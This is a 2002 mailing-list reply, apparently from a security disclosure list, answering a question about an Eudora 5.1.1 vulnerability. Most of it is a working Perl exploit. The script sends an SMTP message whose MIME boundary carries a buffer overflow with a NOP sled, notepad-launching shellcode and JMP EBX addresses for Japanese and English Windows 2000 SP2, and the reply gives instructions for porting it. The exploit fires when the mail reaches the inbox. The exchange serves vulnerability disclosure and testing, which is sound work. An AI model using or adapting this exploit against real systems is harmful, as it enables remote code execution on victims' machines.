Hi Steven. > Likewise, when is the exploit triggered on Japanese Windows 2000 Pro? Exploit triggered when the message is received and listed in the "IN MailBox". Please try this code. It is a exploit code for Eudora 5.1.1 on Japanese win2k pro SP2. If you use English win2k, pls modify the line 44 $buf .= $jmp_ebx_jp; to $buf .= $jmp_ebx_en; and test it. Sorry for my poor English. #!/usr/local/bin/perl #-------------------------------------------------- # Eudora Version 5.1.1 Sponsored Mode exploit # for Japanese Windows 2000 Pro (SP2) # written by Kanatoko <anvil@jumperz.net> # http://www.jumperz.net/ #-------------------------------------------------- use Socket; #0x77e3ac97 JMP EBX ( Japanese SP2 ) $jmp_ebx_jp = "\x97\xAC\xE3\x77"; #0x77e2492b JMP EBX ( English SP2 ) $jmp_ebx_en = "\x2B\x49\xE2\x77"; $connect_host = 'mail.jumperz.net'; $port = 25; $env_from = 'anvil@jumperz.net'; $env_to = 'target@jumperz.net'; $from = 'anvil@jumperz.net'; $to = 'target@jumperz.net'; $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in($port,$iaddr); socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n"; connect(SOCKET,$sock_addr) || die "Connect Error\n"; select(SOCKET); $|=1; select(STDOUT); #egg written by UNYUN (http://www.shadowpenguin.org/) #57bytes $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2"; $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7"; $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C"; $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB"; $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF"; $egg .= "notepad.exe"; $buf = "\x90" x 117; $buf .= $egg; $buf .= "\xEB\xA0"; #JMP -0x60 $buf .= "A" x 2; $buf .= $jmp_ebx_jp; $hoge = <SOCKET>; print SOCKET "HELO hoge\x0D\x0A"; $hoge = <SOCKET>; print SOCKET "MAIL FROM:<$env_from>\x0D\x0A"; $hoge = <SOCKET>; print SOCKET "RCPT TO:<$env_to>\x0D\x0A"; $hoge = <SOCKET>; print SOCKET "DATA\x0D\x0A"; $hoge = <SOCKET>; print SOCKET << "_EOD_"; MIME-Version: 1.0\x0D >From: $from\x0D To: $to\x0D Content-Type: multipart/mixed; boundary="$buf"\x0D \x0D .\x0D _EOD_ $hoge = <SOCKET>;print $hoge; print SOCKET "QUIT\x0D\x0A"; $hoge = <SOCKET>; -- Kanatoko <anvil@jumperz.net> JUMPER : http://www.jumperz.net/ On Fri, 9 Aug 2002 21:19:17 -0500 (CDT) Steven Michaud <smch@midway.uchicago.edu> wrote: > It's not too surprising that this exploit doesn't work on English > Windows 2000 Pro, with or without SP2. But I can't even get it to > crash Eudora (5.1 or 5.1.1) unless I open the hacked message, > right-click on it, and feed it through the "Unwrap Text" plugin. > > Has anyone ported this exploit to English Windows 2000? If so, when > is the exploit triggered? (In the preview pane? When you open the > message? Under some other circumstances?) > > Likewise, when is the exploit triggered on Japanese Windows 2000 Pro? > > Thanks in advance! >
